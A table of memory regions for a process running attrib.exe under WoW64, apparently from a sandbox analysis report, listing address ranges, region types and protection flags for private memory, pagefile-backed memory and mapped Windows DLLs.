private_0x0000000000700000	0x00700000	0x00701fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000710000	0x00710000	0x0074ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000780000	0x00780000	0x0078ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00790000	0x0084dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000850000	0x00850000	0x0094ffff	Private Memory	Readable, Writable	Region Actions
attrib.exe	0x00970000	0x00978fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000980000	0x00980000	0x0497ffff	Pagefile Backed Memory	-	Region Actions
private_0x0000000004980000	0x04980000	0x049bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a90000	0x04a90000	0x04a9ffff	Private Memory	Readable, Writable	Region Actions
fsutilext.dll	0x74000000	0x74009fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ulib.dll	0x74010000	0x74036fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007ebc0000	0x7ebc0000	0x7ecbffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ecc0000	0x7ecc0000	0x7ece2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ece6000	0x7ece6000	0x7ece6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ece8000	0x7ece8000	0x7ece8fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ecea000	0x7ecea000	0x7ececfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007eced000	0x7eced000	0x7eceffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions